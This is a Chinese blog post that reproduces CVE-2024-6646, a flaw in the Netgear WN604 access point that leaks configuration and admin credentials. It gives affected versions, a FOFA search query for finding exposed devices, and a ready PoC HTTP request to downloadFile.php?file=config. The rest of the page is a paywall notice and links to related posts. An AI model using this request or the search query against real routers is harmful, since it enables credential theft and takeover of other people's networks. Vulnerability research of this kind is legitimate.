Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)

已于 2024-07-14 17:21:51 修改
阅读量132 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: 智能路由器 web安全
于 2024-07-14 17:21:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140419101
版权

0x01 产品简介

NETGEAR WN604是一款由NETGEAR(网件)公司生产的无线接入器(或无线路由器)提供Wi-Fi保护协议(WPA2-PSK, WPA-PSK),以及有线等效加密(WEP)64位、128位和152位支持,保障网络安全。同时支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制,进一步增强网络安全性。

0x02 漏洞概述

Netgear WN604 downloadFile.php接口处存在信息泄露漏洞,文件身份验证的远程攻击者可以利用此漏洞获取无线路由器的管理员账号密码信息,导致路由器后台被控,攻击者可对无线网络发起破坏或进一步威胁。

0x03 影响范围

WN604 <= 20240710版本

0x04 复现环境

FOFA:title=="Netgear"

0x05 漏洞复现

PoC

GET /downloadFile.php?file=config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 613
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
网件刷梅林R7000-380.70-0-X7.9.1-koolshare
11-23
网件R7000 路由器 最后一个梅林版本 x7.91 X7.9对应的梅林380最后一个版本,显然还不是那么的完善。其中一个问题就是软件中心稳定性问题,经常发生崩溃!。一些较为常用的插件或不可描述的插件经常用着好好的,点击...
漏洞复现】SOAP WSDL解析器代码注入漏洞CVE-2017-8759)
VI___
01-10 4567
一、CVE-2017-8759 ——类型:.NET Framework漏洞 https://www.freebuf.com/articles/system/147602.html 二、准备 攻击机:kali-2019 192.168.75.149 靶机:win7_x86(关闭防火墙) 192.168.75.139 三、复现过程 1、下载 exp,并将 cm...
Netgear R6700v3 1.0.4.102(CVE-2021-27239)
re1wn
10-02 421
首先明确的是我知道漏洞点在何处,所以先看漏洞点所在函数的函数调用图,找到如何从main函数到此函数并触发漏洞。此漏洞产生的本质是strncpy拷贝的最大长度,错误用法是这个长度取决于输入,所以会造成栈溢出,正确用法应该是取决于要拷贝到的地方的大小。根据本poc,偏移是140比之前找到的偏移136多4,找到的偏移与最终使用的偏移不同,这是1个保留的问题。这句考虑了2点:1、分析IDA反汇编的c代码可以,strncpy复制的长度是MX:与\r\n之间的内容的长度,长度是这个,内容也是这个,所以必加。
CVE-2022-29383 NETGEAR ProSafe SSL SQL注入漏洞
PolarPeak的博客
06-05 628
Firmware version: FVS336Gv2 - FVS336Gv3
CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞
weixin_30567225的博客
02-01 320
SpiderLabs昨天发布的漏洞, 用户访问路由器web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token。然后通过passwordrecovered.cgi?id=TOKEN获取到路由器管理员密码。 漏洞细节 https://www.trustwave.com/Resources/Security-Advisories/Advisories/TW...
NetGear_DGN2200 命令执行漏洞 CVE-2017-6077
weixin_45908624的博客
10-14 778
刚开始对路由器漏洞的学习,先做一个实战尝试一下。
Netgear无线路由器漏洞复现CVE-2019-20760)
蚁景网安学院
05-14 527
本文复现漏洞Netgear路由器远程命令执行漏洞,1.0.4.26之前的NETGEAR R9000设备会受到身份验证绕过的影响,可利用漏洞将木马程序下载下来,获取 shell。
Netatalk CVE-2018-1160的发现与利用
柷敔的博客
02-19 1289
文章翻译自https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172,文章原名《Exploiting an 18 Year Old Bug》,作者 Jacob Baines。
绿盟科技网络安全威胁周报2017.01 请关注MatrixSSL堆缓冲区溢出漏洞CVE-2016-6890
weixin_34077371的博客
09-01 343
绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-39,绿盟科技漏洞库本周新增30条,其中高危9条。本次周报建议大家关注MatrixSSL 堆缓冲区溢出漏洞,目前,此漏洞已经公布了一段时间并且官方已经进行了修复,强烈建议仍在使用受影响版本的用户进行升级。 焦点漏洞 MatrixSSL 堆缓冲区溢出漏洞 NSFOCUS ID 35726 C...
Netgear-R8300-UPnP RCE漏洞分析复现-水滴实验室
m0_55244716的博客
02-20 1060
根据Netgear官方在2020年7月31日发布的公告,在Netgear R8300型号的路由器中,UPNP服务存在缓冲区溢出漏洞(PSV-2020-0211)。 通过对Netgear-R8300-UPnP栈溢出漏洞复现,掌握在仿真情况下对nvram相关问题的处理,注重细节的利用。值得借鉴的是,在漏洞利用过程中,NULL字符截断问题的解决思路。(文章中若有不足之处,请大家见谅) 漏洞分析 固件下载地址 https://www.downloads.netgear.com/files/GDC/R8300/R8
网件梅林固件R6300V2-380.70-0-X7.9.1-koolshare
11-23
网件R6300V2是经典的一款路由器,之所以经典是因为它可以刷梅林固件,今天为大家分享的是最后一版小宝梅林固件
R7000_380.70_0-X7.9.1-koolshare.trx
08-09
网件R7000路由器梅林固件7.9.1固件包,下载直接升级即可(前提系统已是梅林系统),不适用于网件官方原版升级
R7000_380.70_0-X7.9.1-koolshare.chk
04-22
网件R7000 路由器 最后一个梅林版本 x7.91 X7.9对应的梅林380最后一个版本,显然还不是那么的完善。其中一个问题就是软件中心稳定性问题,经常发生崩溃!。一些较为常用的插件或不可描述的插件经常用着好好的,点击...
R6300V2_380.70_0-X7.9.1-koolshare.chk
05-19
网件R6300V2是经典的一款路由器,虽然已经停产,二手仍然活跃在市场上,之所以经典是因为它可以刷梅林固件,今天为大家分享的是最后一版小宝梅林固件,如有需要自行下载。
路由器中 RIB 与 FIB 的区别
u013669912的博客
07-10 327
计算机网络——网络层(IP地址与MAC地址、地址解析协议ARP、IP数据报格式以及转发分组、ICMP、IPV6)
最新发布
2303_80204192的博客
07-13 826
由于MAC地址已固化在网卡上的ROM 中,因此常常将 MAC地址称为硬件地址或物理地址;物理地址的反义词就是虚拟地址、软件地址或逻辑地址,IP地址就属于这类地址。 从层次的角度看,MAC地址是数据链路层使用的地址,而IP地址是网络层和以上各层使用的地址,是一种逻辑地址(称IP地址为逻辑地址是因为IP地址是用软件实现的)。 已经知道了一个机器的IP地址,需要找出其相应的 MAC地址。地址解析协议ARP就是用来解决这样的问题的。 一个IP数据报由首部和数据两部分组成
三级_网络技术_12_路由设计技术基础
2301_80961833的博客
07-10 946
0、4、4、31、3、3、32、2、3、231、3、4、3、10、4、4、2、21、3、4、32、3、4、14、4、55、4、31、1、3、12、2、1、20、4、4、2、20、5、4、2、10、5、4、3、10、4、4、3、20、3、4、3、10、3、4、30、4、4、30、5、4、30、4、4、3、20、5、4、3、10、4、4、30、5、4、30、5、4、3、10、4、4、3、21、2、3、32、1、3、231。
【计算机网络仿真】b站湖科大教书匠思科Packet Tracer——实验18 边界网关协议BGP
Robbi_的博客
07-10 556
1.通过本次实验,我们深入了解了边界网关协议BGP的作用和在思科路由器上的使用方法。我们学会了如何构建网络拓扑、配置路由器IP地址、启动BGP协议并指定邻居,以及进行ping测试和查看路由表等操作。2.计算机网络的相关知识是深刻的,知识量也是非常多的,通过这些实验,我深刻体会到这些协议在实际运用中的奇妙作用,希望在未来我会更加深入的进行研究,不断提高我们的计算机网络实践能力和理论知识水平。2.学习在思科路由器上该协议的使用方法。1.验证边界网关协议BGP的作用;2.验证边界网关协议BGP的作用。
r7000_380.70_0-x7.9.1-koolshare
09-07
r7000_380.70_0-x7.9.1-koolshare 是指适用于Netgear R7000路由器的固件版本,该版本基于380.70_0进行了修改,并添加了X7.9.1和koolshare的额外功能。 Netgear R7000是一款功能强大的无线路由器,通过固件的更新可以提供更多的功能和性能优化。r7000_380.70_0-x7.9.1-koolshare是为了满足用户对路由器的个性化需求而开发的,其特点是在原有固件的基础上进行了修改,并增加了X7.9.1和koolshare的功能。 X7.9.1是一个功能模块,它可能包含了路由器的新功能、改进的用户界面、更稳定的网络连接等等。koolshare是一个第三方软件平台,它为路由器提供了各种额外的功能,例如插件管理、主题更换、远程管理等。 通过r7000_380.70_0-x7.9.1-koolshare固件,用户可以获得更好的路由器体验。例如,用户可以通过X7.9.1功能模块获得更多的功能和用户界面的改进,而通过koolshare平台,用户可以根据自己的需求选择安装各种插件,从而增加路由器的功能。 总结来说,r7000_380.70_0-x7.9.1-koolshare是一个为Netgear R7000路由器定制的固件版本,通过它用户可以获得更好的路由器体验,并且可以根据自己的需求选择安装各种插件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值